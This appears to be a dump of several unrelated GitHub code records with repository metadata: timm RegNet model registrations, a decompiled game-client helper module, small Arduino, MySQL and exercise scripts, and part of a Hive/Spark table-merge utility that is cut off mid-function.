regnetx_002(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-200MF\"\"\"\n return _create_regnet('regnetx_002', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_004(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-400MF\"\"\"\n return _create_regnet('regnetx_004', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_004_tv(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-400MF w/ torchvision group rounding\"\"\"\n return _create_regnet('regnetx_004_tv', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_006(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-600MF\"\"\"\n return _create_regnet('regnetx_006', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_008(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-800MF\"\"\"\n return _create_regnet('regnetx_008', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_016(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-1.6GF\"\"\"\n return _create_regnet('regnetx_016', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_032(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-3.2GF\"\"\"\n return _create_regnet('regnetx_032', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_040(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-4.0GF\"\"\"\n return _create_regnet('regnetx_040', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_064(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-6.4GF\"\"\"\n return _create_regnet('regnetx_064', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_080(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-8.0GF\"\"\"\n return _create_regnet('regnetx_080', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_120(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-12GF\"\"\"\n return _create_regnet('regnetx_120', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_160(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-16GF\"\"\"\n return _create_regnet('regnetx_160', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_320(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-32GF\"\"\"\n return _create_regnet('regnetx_320', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_002(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-200MF\"\"\"\n return _create_regnet('regnety_002', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_004(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-400MF\"\"\"\n return _create_regnet('regnety_004', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_006(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-600MF\"\"\"\n return _create_regnet('regnety_006', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_008(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-800MF\"\"\"\n return _create_regnet('regnety_008', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_008_tv(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-800MF w/ torchvision group rounding\"\"\"\n return _create_regnet('regnety_008_tv', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_016(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-1.6GF\"\"\"\n return _create_regnet('regnety_016', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_032(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-3.2GF\"\"\"\n return _create_regnet('regnety_032', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_040(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-4.0GF\"\"\"\n return _create_regnet('regnety_040', pretrained, **kwargs)\n\n\n@register_model\ndef 
regnety_064(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-6.4GF\"\"\"\n return _create_regnet('regnety_064', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_080(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-8.0GF\"\"\"\n return _create_regnet('regnety_080', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_080_tv(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-8.0GF w/ torchvision group rounding\"\"\"\n return _create_regnet('regnety_080_tv', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_120(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-12GF\"\"\"\n return _create_regnet('regnety_120', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_160(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-16GF\"\"\"\n return _create_regnet('regnety_160', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_320(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-32GF\"\"\"\n return _create_regnet('regnety_320', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_640(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-64GF\"\"\"\n return _create_regnet('regnety_640', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_1280(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-128GF\"\"\"\n return _create_regnet('regnety_1280', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_2560(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-256GF\"\"\"\n return _create_regnet('regnety_2560', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_040_sgn(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-4.0GF w/ GroupNorm \"\"\"\n return _create_regnet('regnety_040_sgn', pretrained, **kwargs)\n\n\n@register_model\ndef regnetv_040(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetV-4.0GF (pre-activation)\"\"\"\n return _create_regnet('regnetv_040', pretrained, **kwargs)\n\n\n@register_model\ndef regnetv_064(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetV-6.4GF (pre-activation)\"\"\"\n return _create_regnet('regnetv_064', pretrained, **kwargs)\n\n\n@register_model\ndef regnetz_005(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetZ-500MF\n NOTE: config found in https://github.com/facebookresearch/ClassyVision/blob/main/classy_vision/models/regnet.py\n but it's not clear it is equivalent to paper model as not detailed in the paper.\n \"\"\"\n return _create_regnet('regnetz_005', pretrained, zero_init_last=False, **kwargs)\n\n\n@register_model\ndef regnetz_040(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetZ-4.0GF\n NOTE: config found in https://github.com/facebookresearch/ClassyVision/blob/main/classy_vision/models/regnet.py\n but it's not clear it is equivalent to paper model as not detailed in the paper.\n \"\"\"\n return _create_regnet('regnetz_040', pretrained, zero_init_last=False, **kwargs)\n\n\n@register_model\ndef regnetz_040_h(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetZ-4.0GF\n NOTE: config found in https://github.com/facebookresearch/ClassyVision/blob/main/classy_vision/models/regnet.py\n but it's not clear it is equivalent to paper model as not detailed in the paper.\n \"\"\"\n return _create_regnet('regnetz_040_h', pretrained, zero_init_last=False, **kwargs)\n\n\nregister_model_deprecations(__name__, {\n 'regnetz_040h': 
'regnetz_040_h',\n})","repo_name":"huggingface/pytorch-image-models","sub_path":"timm/models/regnet.py","file_name":"regnet.py","file_ext":"py","file_size_in_byte":42958,"program_lang":"python","lang":"en","doc_type":"code","stars":27689,"dataset":"github-code","pt":"76"} +{"seq_id":"6955139528","text":"# 2013.11.15 11:27:07 EST\n# Embedded file name: scripts/client/helpers/__init__.py\nimport BigWorld\nimport ResMgr\nimport Settings\nimport i18n, constants\nfrom debug_utils import LOG_CURRENT_EXCEPTION\nimport material_kinds\n\ndef isPlayerAccount():\n return hasattr(BigWorld.player(), 'databaseID')\n\n\ndef isPlayerAvatar():\n return hasattr(BigWorld.player(), 'arena')\n\n\ndef getClientLanguage():\n \"\"\"\n Return client string of language code\n \"\"\"\n lng = constants.DEFAULT_LANGUAGE\n try:\n lng = i18n.makeString('#settings:LANGUAGE_CODE')\n if not lng.strip() or lng == '#settings:LANGUAGE_CODE' or lng == 'LANGUAGE_CODE':\n lng = constants.DEFAULT_LANGUAGE\n except Exception:\n LOG_CURRENT_EXCEPTION()\n\n return lng\n\n\ndef getClientOverride():\n if constants.IS_KOREA:\n return 'KR'\n elif constants.IS_CHINA:\n return 'CN'\n elif constants.IS_VIETNAM:\n return 'VN'\n else:\n return None\n\n\ndef getLocalizedData(dataDict, key, defVal = ''):\n resVal = defVal\n if dataDict:\n lng = getClientLanguage()\n localesDict = dataDict.get(key, {})\n if localesDict:\n if lng in localesDict:\n resVal = localesDict[lng]\n elif constants.DEFAULT_LANGUAGE in localesDict:\n resVal = localesDict[constants.DEFAULT_LANGUAGE]\n else:\n resVal = localesDict.items()[0][1]\n return resVal\n\n\ndef int2roman(number):\n \"\"\"\n Convert arabic number to roman number\n @param number: int - number\n @return: string - roman number\n \"\"\"\n numerals = {1: 'I',\n 4: 'IV',\n 5: 'V',\n 9: 'IX',\n 10: 'X',\n 40: 'XL',\n 50: 'L',\n 90: 'XC',\n 100: 'C',\n 400: 'CD',\n 500: 'D',\n 900: 'CM',\n 1000: 'M'}\n result = ''\n for value, numeral in sorted(numerals.items(), reverse=True):\n while number >= value:\n result += numeral\n number -= value\n\n return result\n\n\ndef getClientVersion():\n sec = ResMgr.openSection('../version.xml')\n version = i18n.makeString(sec.readString('appname')) + ' ' + sec.readString('version')\n return version\n\n\ndef getClientOverride():\n if constants.IS_KOREA:\n return 'KR'\n elif constants.IS_CHINA:\n return 'CN'\n elif constants.IS_VIETNAM:\n return 'VN'\n else:\n return None\n\n\ndef isShowStartupVideo():\n if not BigWorld.wg_isSSE2Supported():\n return False\n else:\n p = Settings.g_instance.userPrefs\n return p is None or p.readInt(Settings.KEY_SHOW_STARTUP_MOVIE, 1) == 1\n\n\ndef calcEffectMaterialIndex(matKind):\n if matKind != 0:\n return material_kinds.EFFECT_MATERIAL_INDEXES_BY_IDS.get(matKind)\n else:\n effectIndex = -1\n if isPlayerAvatar():\n arenaSpecificEffect = BigWorld.player().arena.arenaType.defaultGroundEffect\n if arenaSpecificEffect is not None:\n if arenaSpecificEffect == 'None':\n return\n if not isinstance(arenaSpecificEffect, int):\n effectIndex = material_kinds.EFFECT_MATERIAL_INDEXES_BY_NAMES.get(arenaSpecificEffect)\n effectIndex = -1 if effectIndex is None else effectIndex\n BigWorld.player().arena.arenaType.defaultGroundEffect = effectIndex\n else:\n effectIndex = arenaSpecificEffect\n return effectIndex\n return\n# okay decompyling res/scripts/client/helpers/__init__.pyc \n# decompiled 1 files: 1 okay, 0 failed, 0 verify failed\n# 2013.11.15 11:27:07 
EST\n","repo_name":"Omegaice/WOTDecompiled","sub_path":"res/scripts/client/helpers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"30367196691","text":"import serial\nimport time\nimport sqlite3\n\nconn = sqlite3.connect('data.db')\nfrom random import randint\nimport UseDatabase\n\nc = conn.cursor()\n\nCOMPOORT = int(input(\"De Arduino is aangesloten op COM-poort \"))\n\nser = serial.Serial(COMPOORT - 1)\nkey = randint(10000, 90000)\nkey2 = int(key/1000)\nkey3 = int(key/100)\nkey4 = int(key/10)\n\n\ndef decrypt(userid):\n return userid + int(key4 - key2)*int(key - key3)\n\n\ndef readArduino():\n while ser.readline().strip() != b'test':\n time.sleep(1)\n\n ser.write(str(key).encode())\n s = ser.readline().strip()\n userid = decrypt(int(s))\n return userid","repo_name":"Projectgroep-18/Beveiligde-Pasjes","sub_path":"python_code_for_reading_uid.py","file_name":"python_code_for_reading_uid.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7638117083","text":"#!/usr/bin/python3\n\"\"\" Import the sys.arg \"\"\"\nimport MySQLdb\nimport sys\n\nif __name__ == \"__main__\":\n # Database Conection\n db = MySQLdb.connect(host=\"localhost\",\n port=3306,\n user=sys.argv[1],\n passwd=sys.argv[2],\n db=sys.argv[3])\n\n cur = db.cursor()\n\n cur.execute(\"SELECT cities.name FROM cities LEFT JOIN states\\\n ON states.id = cities.state_id WHERE states.name = %s\\\n ORDER BY cities.id ASC;\", (sys.argv[4],))\n\n query = cur.fetchall()\n list_a = []\n for element in query:\n list_a.append(element[0])\n result = \", \".join(list_a)\n print(result)\n\n cur.close()\n db.close()\n","repo_name":"gomba66/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37242578587","text":"#!/usr/bin/env python\n#imports\nimport pubchempy as pcp\nimport pandas as pd\nimport numpy as np\n\n#remove duplicates function\ndef remove_duplicates_molconvert(file):\n\n\t'''Function that removes duplicates from a textfile \n\n\tInput: \n\t\tDescription: a textfile (.txt) with all chemical names outputted by molconvert\n\t\tFile type: textfile(.TXT)\n\t\texample: names_mol.txt\n\t\n\tReturns: a textfile(.txt) with chemical names and duplicates are removed'''\n\n\t#with open file, read lines and make a list\n\twith open(file) as f:\n\t\tcontent = f.readlines()\n\tcontent = [x.strip() for x in content]\n\tprint(content)\n\t#initialize new list\n\tnew_list = []\n\t#loop through the content list\n\tfor compound in content:\n\t\tprint(compound)\n\t\t#remove duplicates,\n\t\tif compound not in new_list:\n\t\t\t#append it to the list\n\t\t\tnew_list.append(compound)\n\n\tprint(new_list)\n\t#open a new textfile and write each item in list to textfile\n\twith open(\"final_mol.txt\",\"w\") as textfile:\n\t\tfor i in new_list:\n\t\t\ttextfile.write(i + \"\\n\")\n\t\ttextfile.close()\n\n'''file = \"names_mol.txt\"\n#run 
function\nremove_duplicates(file)'''","repo_name":"muthuku/polyname","sub_path":"molconvert/remove_duplicates_function.py","file_name":"remove_duplicates_function.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12711193461","text":"\"\"\"\nWrite a function that has two parameters: orders and cost. Return any orders that are greater than the cost.\n\nExamples\nexpensive_orders({ \"a\": 3000, \"b\": 200, \"c\": 1050 }, 1000)\n➞ { \"a\": 3000, \"c\": 1050 }\n\nexpensive_orders({ \"Gucci Fur\": 24600, \"Teak Dining Table\": 3200, \"Louis Vutton Bag\": 5550, \"Dolce Gabana Heels\": 4000 }, 20000)\n➞ { \"Gucci Fur\": 24600 }\n\nexpensive_orders({ \"Deluxe Burger\": 35, \"Icecream Shake\": 4, \"Fries\": 5 }, 40)\n➞ {}\n\"\"\"\n\ndef expensive_orders(orders, cost):\n\n # return {key: val for key, val in orders.items() if val > cost}\n\n result = {}\n for key, value in orders.items():\n if value > cost:\n result[key] = value\n return result\n\n\nprint(expensive_orders({\"a\": 3000, \"b\": 200, \"c\": 1050}, 1000))\nprint(expensive_orders({ \"Gucci Fur\": 24600, \"Teak Dining Table\": 3200, \"Louis Vutton Bag\": 5550, \"Dolce Gabana Heels\": 4000 }, 20000))\nprint(expensive_orders({ \"Deluxe Burger\": 35, \"Icecream Shake\": 4, \"Fries\": 5 }, 40))\n\n\n\n","repo_name":"kazuhiko1979/edabit","sub_path":"062_normal_Expensive Orders.py","file_name":"062_normal_Expensive Orders.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"23822327156","text":"import sys\nimport re\nimport logging\nimport subprocess\nimport errno, os, pty\nimport shlex\nfrom subprocess import Popen, PIPE\nfrom ConfigReader import configuration\nimport mysql.connector\nfrom mysql.connector import errorcode\nfrom common.Singleton import Singleton\nfrom common import constants as constant\nfrom DBImportConfig import import_config\nfrom DBImportOperation import import_operations\nfrom DBImportOperation import common_operations\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport numpy as np\nimport time\n\nclass operation(object, metaclass=Singleton):\n\tdef __init__(self, Hive_DB=None, Hive_Table=None):\n\t\tlogging.debug(\"Executing etl_operations.__init__()\")\n\t\tself.Hive_DB = None\n\t\tself.Hive_Table = None\n\t\tself.mysql_conn = None\n\t\tself.mysql_cursor = None\n\t\tself.startDate = None\n\n\t\tself.common_operations = common_operations.operation(Hive_DB, Hive_Table)\n\t\tself.import_operations = import_operations.operation(Hive_DB, Hive_Table)\n\t\tself.import_config = import_config.config(Hive_DB, Hive_Table)\n\n\t\tif Hive_DB != None and Hive_Table != None:\n\t\t\tself.setHiveTable(Hive_DB, Hive_Table)\n\t\telse:\n\t\t\t# If the class already is initialized, we just pull the parameters and set them here\n\t\t\tself.Hive_DB = self.common_operations.Hive_DB\n\t\t\tself.Hive_Table = self.common_operations.Hive_Table\n\t\t\tself.startDate = self.import_config.startDate\n\n\t\tlogging.debug(\"Executing etl_operations.__init__() - Finished\")\n\n\tdef setHiveTable(self, Hive_DB, Hive_Table):\n\t\t\"\"\" Sets the parameters to work against a new Hive database and table \"\"\"\n\t\tself.Hive_DB = Hive_DB.lower()\n\t\tself.Hive_Table = Hive_Table.lower()\n\n\t\tself.common_operations.setHiveTable(self.Hive_DB, self.Hive_Table)\n\t\tself.import_config.setHiveTable(self.Hive_DB, 
self.Hive_Table)\n\n\t\ttry:\n\t\t\tself.import_config.getImportConfig()\n\t\t\tself.startDate = self.import_config.startDate\n\t\t\tself.import_config.lookupConnectionAlias()\n\t\texcept:\n\t\t\tself.import_config.remove_temporary_files()\n\t\t\tsys.exit(1)\n\n\tdef remove_temporary_files(self):\n\t\tself.import_config.remove_temporary_files()\n\n\tdef connectToHive(self,):\n\t\tlogging.debug(\"Executing etl_operations.connectToHive()\")\n\n\t\ttry:\n\t\t\tself.common_operations.connectToHive()\n\t\texcept Exception as ex:\n\t\t\tlogging.error(ex)\n\t\t\tself.import_config.remove_temporary_files()\n\t\t\tsys.exit(1)\n\n\t\tlogging.debug(\"Executing etl_operations.connectToHive() - Finished\")\n\n\tdef executeSQLQuery(self, query):\n\t\tif self.import_config.etlEngine == constant.ETL_ENGINE_HIVE:\n\t\t\tself.common_operations.executeHiveQuery(query)\n\n\t\tif self.import_config.etlEngine == constant.ETL_ENGINE_SPARK:\n\t\t\tself.import_operations.spark.sql(query)\n\n\tdef mergeHiveTables(self, sourceDB, sourceTable, targetDB, targetTable, historyDB = None, historyTable=None, targetDeleteDB = None, targetDeleteTable=None, createHistoryAudit=False, sourceIsIncremental=False, sourceIsImportTable=False, softDelete=False, mergeTime=datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'), datalakeSource=None, PKColumns=None, hiveMergeJavaHeap=None, oracleFlashbackSource=False, mssqlChangeTrackingSource=False, oracleFlashbackImportTable=None, mssqlChangeTrackingImportTable=None, ChangeDataTrackingInitialLoad=False):\n\t\t\"\"\" Merge source table into Target table. Also populate a History Audit table if selected \"\"\"\n\t\tlogging.debug(\"Executing etl_operations.mergeHiveTables()\")\n\n\t\ttargetColumns = self.common_operations.getHiveColumns(hiveDB=targetDB, hiveTable=targetTable, includeType=False, includeComment=False)\n\t\tcolumnMerge = self.common_operations.getHiveColumnNameDiff(sourceDB=sourceDB, sourceTable=sourceTable, targetDB=targetDB, targetTable=targetTable, importTool = self.import_config.importTool, sourceIsImportTable=True)\n\t\tif PKColumns == None:\n\t\t\tPKColumns = self.common_operations.getPKfromTable(hiveDB=targetDB, hiveTable=targetTable, quotedColumns=False)\n\n\t\tsourceDBandTable = \"`%s`.`%s`\"%(sourceDB, sourceTable)\n\t\ttargetDBandTable = \"`%s`.`%s`\"%(targetDB, targetTable)\n\t\thistoryDBandTable = \"`%s`.`%s`\"%(historyDB, historyTable)\n\t\ttargetDeleteDBandTable = \"`%s`.`%s`\"%(targetDeleteDB, targetDeleteTable)\n\t\toracleFlashbackImportDBandTable = \"`%s`.`%s`\"%(sourceDB, oracleFlashbackImportTable)\n\t\tmssqlChangeTrackingImportDBandTable = \"`%s`.`%s`\"%(sourceDB, mssqlChangeTrackingImportTable)\n\n\t\tif self.import_config.etlEngine == constant.ETL_ENGINE_SPARK:\n\t\t\tsourceDBandTable = \"hive.%s\"%(sourceDBandTable)\n\t\t\ttargetDBandTable = \"hive.%s\"%(targetDBandTable)\n\t\t\thistoryDBandTable = \"hive.%s\"%(historyDBandTable)\n\t\t\ttargetDeleteDBandTable = \"hive.%s\"%(targetDeleteDBandTable)\n\t\t\toracleFlashbackImportDBandTable = \"hive.%s\"%(oracleFlashbackImportDBandTable)\n\t\t\tmssqlChangeTrackingImportDBandTable = \"hive.%s\"%(mssqlChangeTrackingImportDBandTable)\n\t\t\tself.import_operations.startSpark()\n\n\t\tdatalakeIUDExists = False\n\t\tdatalakeInsertExists = False\n\t\tdatalakeUpdateExists = False\n\t\tdatalakeDeleteExists = False\n\t\tdatalakeSourceExists = False\n\n\t\tfor index, row in targetColumns.iterrows():\n\t\t\tif row['name'] == \"datalake_iud\": datalakeIUDExists = True \n\t\t\tif row['name'] == \"datalake_insert\": 
datalakeInsertExists = True \n\t\t\tif row['name'] == \"datalake_update\": datalakeUpdateExists = True \n\t\t\tif row['name'] == \"datalake_delete\": datalakeDeleteExists = True \n\t\t\tif row['name'] == \"datalake_source\": datalakeSourceExists = True \n\n\t\tif self.import_config.etlEngine == constant.ETL_ENGINE_HIVE:\n\t\t\tif hiveMergeJavaHeap != None:\n\t\t\t\tquery = \"set hive.tez.container.size=%s\"%(hiveMergeJavaHeap)\n\t\t\t\tself.common_operations.executeHiveQuery(query)\n\n\t\tprintSQLQuery = False\n\n\t\tquery = \"merge into %s as T \\n\"%(targetDBandTable)\n\t\tquery += \"using %s as S \\n\"%(sourceDBandTable)\n\t\tquery += \"on \\n\"\n\n\t\tfor i, targetColumn in enumerate(PKColumns.split(\",\")):\n\t\t\ttry:\n\t\t\t\tsourceColumn = columnMerge.loc[columnMerge['Exist'] == 'both'].loc[columnMerge['targetName'] == targetColumn].iloc[0]['sourceName']\n\t\t\texcept IndexError:\n\t\t\t\tlogging.error(\"Primary Key cant be found in the source target table. Please check PK override\")\n\t\t\t\tself.import_config.remove_temporary_files()\n\t\t\t\tsys.exit(1)\n\n\t\t\tif sourceColumn == None:\n\t\t\t\tlogging.error(\"ERROR: Problem determine column name in source table for primary key column '%s'\"%(targetColumn))\n\t\t\t\tself.import_config.remove_temporary_files()\n\t\t\t\tsys.exit(1)\n\n\t\t\tif i == 0: \n\t\t\t\tquery += \" T.`%s` = S.`%s` \"%(targetColumn, sourceColumn)\n\t\t\telse:\n\t\t\t\tquery += \"and\\n T.`%s` = S.`%s` \"%(targetColumn, sourceColumn)\n\t\tquery += \"\\n\"\n\t\n\t\tquery += \"when matched \"\n\t\tif sourceIsIncremental == False:\n\t\t\t# If the source is not incremental, it means that we need to check all the values in \n\t\t\t# all columns as we dont know if the row have changed or not\n\t\t\tquery += \"and (\\n\"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tfoundPKcolumn = False\n\t\t\t\tfor column in PKColumns.split(\",\"):\n\t\t\t\t\tif row['targetName'] == column:\n\t\t\t\t\t\tfoundPKcolumn = True\n\t\t\t\tif foundPKcolumn == False:\n\t\t\t\t\tif firstIteration == True:\n\t\t\t\t\t\tquery += \" \"\n\t\t\t\t\t\tfirstIteration = False\n\t\t\t\t\telse:\n\t\t\t\t\t\tquery += \" or \"\n\t\t\t\t\tquery += \"T.`%s` != S.`%s` \"%(row['targetName'], row['sourceName'])\n\t\t\t\t\tquery += \"or ( T.`%s` is null and S.`%s` is not null ) \"%(row['targetName'], row['sourceName'])\n\t\t\t\t\tquery += \"or ( T.`%s` is not null and S.`%s` is null ) \"%(row['targetName'], row['sourceName'])\n\t\t\t\t\tquery += \"\\n\"\n\n\t\t\tif softDelete == True and datalakeIUDExists == True:\n\t\t\t\t# If a row is deleted and then inserted again with the same values in all fields, this will still trigger an update\n\t\t\t\tquery += \" or T.datalake_iud = 'D' \\n\"\n\n\t\t\tquery += \") \\n\"\n\n\t\tif oracleFlashbackSource == True:\n\t\t\tquery += \"and ( S.datalake_flashback_operation is null or S.datalake_flashback_operation != 'D' ) \\n\"\n\n\t\tif mssqlChangeTrackingSource == True:\n\t\t\tquery += \"and ( S.datalake_mssql_changetrack_operation is null or S.datalake_mssql_changetrack_operation != 'D' ) \\n\"\n\n\t\tquery += \"then update set \"\n\t\tfirstIteration = True\n\t\tnonPKcolumnFound = False\n\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\tfoundPKcolumn = False\n\t\t\tfor column in PKColumns.split(\",\"):\n\t\t\t\tif row['targetName'] == column:\n\t\t\t\t\tfoundPKcolumn = True\n\t\t\tif foundPKcolumn == False:\n\t\t\t\tif firstIteration == 
True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s` = S.`%s`\"%(row['targetName'], row['sourceName'])\n\t\t\t\tnonPKcolumnFound = True\n\n\t\tif nonPKcolumnFound == False:\n\t\t\t# This will happen if there are only columns that is part of the PK in the table. Impossible to merge it with full history\n\t\t\tlogging.error(\"This table only have columns that is part of the PrimaryKey. Merge operations cant be used\")\n\t\t\tself.import_config.remove_temporary_files()\n\t\t\tsys.exit(1)\n\n\t\tif datalakeIUDExists == True: \n\t\t\tquery += \", \\n `datalake_iud` = 'U'\"\n\n\t\tif datalakeUpdateExists == True:\n\t\t\tquery += \", \\n `datalake_update` = TIMESTAMP('%s')\"%(mergeTime)\n\n\t\tif datalakeSourceExists == True and datalakeSource != None: \n\t\t\tquery += \", \\n `datalake_source` = '%s'\"%(datalakeSource)\n\n\t\tquery += \" \\n\"\n\n\t\tif oracleFlashbackSource == True:\n\t\t\tquery += \"when matched and S.datalake_flashback_operation = 'D' then delete \\n\"\n\n\t\t# We should only delete rows during merge if we dont need to create the History table. Otherwise we will miss the values in all columns except PK columns\n\t\tif mssqlChangeTrackingSource == True and createHistoryAudit == False:\n\t\t\tquery += \"when matched and S.datalake_mssql_changetrack_operation = 'D' then delete \\n\"\n\n\t\tquery += \"when not matched \"\n\n\t\tif oracleFlashbackSource == True:\n\t\t\tquery += \"and ( S.datalake_flashback_operation is null or S.datalake_flashback_operation != 'D' ) \\n\"\n\n\t\tif mssqlChangeTrackingSource == True:\n\t\t\tquery += \"and ( S.datalake_mssql_changetrack_operation is null or S.datalake_mssql_changetrack_operation != 'D' ) \\n\"\n\n\t\tquery += \"then insert ( \"\n\t\tfirstIteration = True\n\t\tfor index, row in targetColumns.iterrows():\n\t\t\tColumnName = row['name']\n\t\t\tif firstIteration == True:\n\t\t\t\tfirstIteration = False\n\t\t\t\tquery += \" \\n\"\n\t\t\telse:\n\t\t\t\tquery += \", \\n\"\n\t\t\tquery += \" `%s`\"%(ColumnName)\n\t\tquery += \" \\n) values (\"\n\n\t\tfirstIteration = True\n\t\tfor index, row in targetColumns.iterrows():\n\t\t\tColumnName = row['name']\n\t\t\tsourceColumnName = columnMerge.loc[columnMerge['targetName'] == ColumnName]['sourceName'].fillna('').iloc[0]\n\t\t\tif firstIteration == True:\n\t\t\t\tfirstIteration = False\n\t\t\t\tquery += \" \\n\"\n\t\t\telse:\n\t\t\t\tquery += \", \\n\"\n\t\t\tif sourceColumnName != \"\":\n\t\t\t\tquery += \" S.`%s`\"%(sourceColumnName)\n\t\t\telif ColumnName == \"datalake_iud\": \n\t\t\t\tquery += \" 'I'\"\n\t\t\telif ColumnName == \"datalake_insert\": \n\t\t\t\tquery += \" TIMESTAMP('%s')\"%(mergeTime)\n\t\t\telif ColumnName == \"datalake_update\": \n\t\t\t\tquery += \" TIMESTAMP('%s')\"%(mergeTime)\n\t\t\telif ColumnName == \"datalake_source\": \n\t\t\t\tquery += \" '%s'\"%(datalakeSource)\n\t\t\telse:\n\t\t\t\tquery += \" NULL\"\n\n\t\tquery += \" \\n) \\n\"\n\n\t\tif printSQLQuery == True:\n\t\t\tprint(\"==============================================================\")\n\t\t\tprint(query)\n\n\t\tself.executeSQLQuery(query)\n\n\t\t# If a row was previously deleted and now inserted again and we are using Soft Delete, \n\t\t# then the information in the datalake_iud, datalake_insert and datalake_delete is wrong. 
\n\t\tif softDelete == True:\n\t\t\tquery = \"update %s set \"%(targetDBandTable)\n\t\t\tquery += \" datalake_iud = 'I', \"\n\t\t\tquery += \" datalake_insert = datalake_update, \"\n\t\t\tquery += \" datalake_delete = null \"\n\t\t\tquery += \"where \" \n\t\t\tquery += \" datalake_iud = 'U' and \"\n\t\t\tquery += \" datalake_delete is not null \\n\"\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\t# Statement to select all rows that was changed in the Target table and insert them to the History table\n\t\tif (createHistoryAudit == True and historyDB != None and historyTable != None and oracleFlashbackSource == False and mssqlChangeTrackingSource == False) or \\\n\t\t\t(createHistoryAudit == True and historyDB != None and historyTable != None and mssqlChangeTrackingSource == True and sourceIsIncremental == False):\n\t\t\tquery = \"insert into table %s \\n\"%(historyDBandTable) \n\t\t\tquery += \"( \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == 